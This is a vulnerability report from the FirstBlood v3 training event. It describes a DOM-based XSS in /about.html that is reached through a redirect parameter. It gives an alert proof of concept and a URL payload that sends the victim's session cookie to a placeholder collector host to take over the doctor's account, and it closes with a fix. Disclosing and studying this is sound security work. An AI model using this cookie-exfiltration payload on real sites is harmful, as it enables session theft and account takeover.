FirstBlood-#1102 — DOM-based XSS on /about.html can lead to account takeover
This issue was discovered on FirstBlood v3
On 2022-12-08, 0xblackbird Level 5 reported:
Summary:
Hi mate!
I hope you're doing well today!
I found a DOM-based XSS vulnerability on about.html, it was hard to catch as it immediately redirects you to about.php ;)
Possible cause:
User input that got passed through the return_url query parameter ends up in a DOM sink. We could use the javascript protocol to execute javascript directly in our browser.
Impact:
I was able to execute javascript code on the doctor's behalf. Even more, I was also able to steal the sensitive session cookie as it is not an HTTPOnly cookie. This allowed me to successfully take over the account of the doctor.
Steps to reproduce:
Proof of concept: /about.html?redirect_url=javascript:alert(document.domain)
1) Spin up firstblood v3 if you haven't already
2) Visit the path PoC above
3) An alert popup should appear with the document's domain
Now, if the user is authenticated, we can easily takeover the doctor's account as cookies are not HTTPOnly. To do so, we could use the following payload to steal and send the cookies back to us:
/about.html?redirect_url=javascript:location.href%3D%60//{BURP_COLLABORATOR}/collector?cookies=${document.cookie}%60
Upon visiting the URL (as the victim), we can see a hit with the cookies on our server:
Mitigation
For DOM-based XSS vulnerabilities, I recommend not passing raw user input into DOM sinks without proper validation. Use the history.pushState()
method if you want to redirect a user without them ending up somewhere else or having JS executed in their web browser.
Thanks for hosting such an awesome event again!
Kind regards,
0xblackbird
P3 Medium
Endpoint: /about.html
Parameter: redirect_url
Payload: javascript:alert(document.domain)
FirstBlood ID: 45
Vulnerability Type: Reflective XSS
The endpoint about.php was introduced to replace about.html, but code on about.html introduces an XSS vulnerability via the javascript: URI